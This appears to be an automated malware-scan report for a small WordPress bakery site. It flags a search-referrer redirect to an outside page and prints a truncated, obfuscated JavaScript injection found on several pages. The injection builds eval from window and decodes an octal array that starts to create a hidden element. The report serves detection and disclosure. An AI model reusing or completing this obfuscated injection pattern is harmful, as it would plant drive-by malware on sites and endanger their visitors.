Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.jenscakepops.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.jenscakepops.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Sep 2014 10:25:25 GMT Location: http://habboigratis.altervista.org/ohmf.html?h=1453423 Server: Apache Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.jenscakepops.com/ | 200 OK Content-Length: 11919 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162, Antivirus reports:
| ||
http://www.jenscakepops.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.jenscakepops.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.jenscakepops.com/wp-content/themes/bueno/includes/js/general.js?ver=4.0 | 200 OK Content-Length: 697 Content-Type: application/javascript | clean |
http://www.jenscakepops.com/wp-content/themes/bueno/includes/js/superfish.js?ver=4.0 | 200 OK Content-Length: 3772 Content-Type: application/javascript | clean |
http://www.jenscakepops.com/?p=8 | 200 OK Content-Length: 12987 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162, Antivirus reports:
| ||
http://www.jenscakepops.com/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.jenscakepops.com/?cat=1 | 200 OK Content-Length: 12468 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162, Antivirus reports:
| ||
http://www.jenscakepops.com/?feed=rss2&cat=1 | 200 OK Content-Length: 2579 Content-Type: text/xml | clean |
http://www.jenscakepops.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.jenscakepops.com/?p=1 | 200 OK Content-Length: 13158 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162, Antivirus reports:
| ||
http://www.jenscakepops.com/wp-login.php | 200 OK Content-Length: 3202 Content-Type: text/html | clean |
http://www.jenscakepops.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 2846 Content-Type: text/html | clean |
http://www.jenscakepops.com/?feed=rss2 | 200 OK Content-Length: 2547 Content-Type: text/xml | clean |
http://www.jenscakepops.com/?feed=comments-rss2 | 200 OK Content-Length: 714 Content-Type: text/xml | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jenscakepops.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jenscakepops.com/
Result: jenscakepops.com is not infected or malware details are not published yet.
Result: jenscakepops.com is not infected or malware details are not published yet.